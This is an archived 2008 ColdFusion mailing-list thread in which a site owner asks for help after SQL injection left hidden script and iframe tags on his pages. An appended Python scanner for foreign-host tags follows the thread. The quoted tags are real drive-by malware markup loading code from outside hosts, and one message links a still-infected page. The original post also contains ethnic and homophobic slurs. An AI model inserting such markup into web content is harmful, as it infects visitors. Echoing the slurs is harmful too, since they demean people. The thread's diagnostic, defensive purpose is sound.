was sql injection, and jerry has been helping me offline. its fixed now, how do i get it off the red list?
:(

-- tony

Better than a thousand hollow words, is one word that brings peace.
-- siddhartha gautama

On Wed, Sep 3, 2008 at 12:06 AM, Zaphod Beeblebrox <[EMAIL PROTECTED]> wrote:
> that looks like a source .cfm file has been corrupted to me. If it were a
> data issue, I don't think you'd see the iframe wrapping the original
> content.
>
> my manager had a similar problem right after they had the sql injection
> issue. Somehow the hackers were able to get into the .cfm files and inject
> code into the index.cfm files themselves.
>
>
> On Tue, Sep 2, 2008 at 10:44 PM, Kelly <[EMAIL PROTECTED]> wrote:
>
>> sounds like a sql injection. make sure you are using CFQUERYPARAM
>> on your queries.
>> The code is most likely coming from your database so it must not be
>> completely clean yet if you're still seeing it on the page.
>>
>> Tony wrote:
>> > this is a URL you can view the code on
>> >
>> > http://www.salisburyhousing.com/viewListings.cfm?step=2&id=106
>> >
>> > and dont worry, it will try to do something and break your browser and
>> > install something but it doesnt do anything from what i can tell :)
>> > you have been warned tho.
>> >
>> > -- tony
>> >
>> > Better than a thousand hollow words, is one word that brings peace.
>> > -- siddhartha gautama
>> >
>> >
>> >
>> > On Tue, Sep 2, 2008 at 10:58 PM, Tony <[EMAIL PROTECTED]> wrote:
>> >
>> >> a site of mine has been hacked.
>> >> they dropped a file in the www root of
>> >> the site, and infected the database with
>> >> bad data. ive cleaned everything i can find
>> >> in the data, its all gone... BUT when i view
>> >> the pages... i get this in the code:
>> >>
>> >> <script src="http://jjmaobuduo.3322.org/csrss/w.js">
>> >> </script>
>> >> <iframe width="0" scrolling="no" height="0" frameborder="0"
>> >> src="
>> http://count41.51yes.com/sa.aspx?id=419214144&refe=http%3A//www.salisburyhousing.com/listings.cfm%3Fshow%3Dstudent&location=http%3A//www.salisburyhousing.com/viewListings.cfm%3Fstep%3D2%26id%3D26&color=32x&resolution=1280x1024&returning=0&language=undefined&ua=Mozilla/5.0%20%28Windows%3B%20U%3B%20Windows%20NT%206.0%3B%20en-US%3B%20rv%3A1.8.1.16%29%20Gecko/20080702%20Firefox/2.0.0.16
>> "
>> >> vspace="0" hspace="0" marginheight="0" marginwidth="0">
>> >> </iframe>
>> >> <iframe width="0" height="0" src="http://www0.douhunqn.cn/csrss/new.htm
>> ">
>> >> </iframe>
>> >> <script src="http://jjmaoduo.3322.org/csrss/w.js">
>> >>
>> >> under any of the property images. trouble is i cant find this shit
>> >> anywhere. ANYWAY
>> >> seems that some CHINESE FUCKS at http://www.51yes.com are sending
>> FAGGOT FUCK
>> >> faces out to infect our shit, then get traffic from it... and i guess
>> >> somehow make money from
>> >> it. anyway... anyone have any idea what the fuck i should do?
>> >>
>> >> sorry for the profanity, im so damn sick to my stomach.
>> >>
>> >> -- tony
>> >>
>> >> Better than a thousand hollow words, is one word that brings peace.
>> >> -- siddhartha gautama

Archive: http://www.houseoffusion.com/groups/CF-Community/message.cfm/messageid:267544
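The thread leaves open whether the injected markup lives in database rows or in the .cfm source files. The following added example (not part of the original messages) runs the same check over both: it flags `<script>` and `<iframe>` tags that load from a host other than the site's own and marks zero-size iframes like the ones quoted above. The host names, labels and sample content are constructed placeholders.

```python
import re
from urllib.parse import urlparse

# Opening <script>/<iframe> tags; [^>]* also spans line breaks inside a tag.
TAG_RE = re.compile(r"<(script|iframe)\b([^>]*)>", re.IGNORECASE)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?\s*([^"'\s>]+)""", re.IGNORECASE)
ZERO_RE = re.compile(r"""\b(width|height)\s*=\s*["']?0\b""", re.IGNORECASE)

OWN_HOSTS = {"www.example.org"}  # assumption: hosts the site legitimately loads from

# Constructed sample: one database column value and two template files.
SAMPLE = {
    "listings.description id=1": 'Two bedroom near campus'
        '<script src="http://injected.example/csrss/w.js"></script>',
    "index.cfm": '<cfoutput>#title#</cfoutput>\n'
        '<iframe width="0" height="0" src="\nhttp://counter.example/sa.aspx?id=1\n"'
        ' marginwidth="0"></iframe>\n<script src="/js/site.js"></script>',
    "footer.cfm": '<script src="http://www.example.org/js/menu.js"></script>',
}

def find_injected_tags(text, own_hosts):
    """Return (tag, host, hidden) for script/iframe tags loading from foreign hosts."""
    findings = []
    for tag, attrs in TAG_RE.findall(text):
        src = SRC_RE.search(attrs)
        if not src:
            continue
        host = (urlparse(src.group(1)).hostname or "").lower()
        if not host or host in own_hosts:
            continue  # relative URL or one of our own hosts
        zero = {name.lower() for name in ZERO_RE.findall(attrs)}
        findings.append((tag.lower(), host, zero == {"width", "height"}))
    return findings

def scan_sources(sources, own_hosts):
    """Map each label (row id or file name) to its findings, omitting clean ones."""
    report = {}
    for label, text in sources.items():
        hits = find_injected_tags(text, own_hosts)
        if hits:
            report[label] = hits
    return report

if __name__ == "__main__":
    for label, hits in scan_sources(SAMPLE, OWN_HOSTS).items():
        print(label, hits)
```

Feeding it every text column and every template file shows which side still carries the markup; hits only in files point to modified source rather than leftover data.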
